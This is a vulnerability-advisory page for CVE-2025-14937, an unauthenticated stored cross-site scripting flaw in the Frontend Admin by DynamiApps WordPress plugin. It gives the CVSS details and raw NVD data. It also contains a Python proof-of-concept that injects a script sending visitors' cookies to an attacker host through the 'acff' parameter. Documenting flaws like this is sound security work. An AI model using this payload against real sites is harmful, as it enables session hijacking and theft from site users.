Security Vulnerability Report
中文
CVE-2025-14937 CVSS 7.2 HIGH

CVE-2025-14937

Published: 2026-01-09 08:15:58
Last Modified: 2026-04-15 00:35:42

Description

The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'acff' parameter in the 'frontend_admin/forms/update_field' AJAX action in all versions up to, and including, 3.28.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Frontend Admin by DynamiApps <= 3.28.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14937 PoC - Stored XSS in Frontend Admin Plugin # Target: WordPress with Frontend Admin plugin <= 3.28.23 target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # XSS payload - steals cookies xss_payload = "<script>fetch('https://attacker.com/log?c='+document.cookie)</script>" # Exploit the vulnerable AJAX endpoint endpoint = f"{target_url}/wp-admin/admin-ajax.php" data = { 'action': 'frontend_admin/forms/update_field', 'acff': xss_payload } print(f"[*] Sending XSS payload to {endpoint}") print(f"[*] Payload: {xss_payload}") response = requests.post(endpoint, data=data) if response.status_code == 200: print("[+] Payload sent successfully!") print("[+] The XSS will execute when anyone visits the affected page.") else: print(f"[-] Request failed with status: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14937", "sourceIdentifier": "[email protected]", "published": "2026-01-09T08:15:57.813", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'acff' parameter in the 'frontend_admin/forms/update_field' AJAX action in all versions up to, and including, 3.28.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin Frontend Admin by DynamiApps para WordPress es vulnerable a cross-site scripting almacenado a través del parámetro 'acff' en la acción AJAX 'frontend_admin/forms/update_field' en todas las versiones hasta la 3.28.23, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto hace posible que atacantes no autenticados inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3427236/acf-frontend-form-element", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/46c988ff-9cc5-4f2b-a3dd-06eaef5a7919?source=cve", "source": "[email protected]"}]}}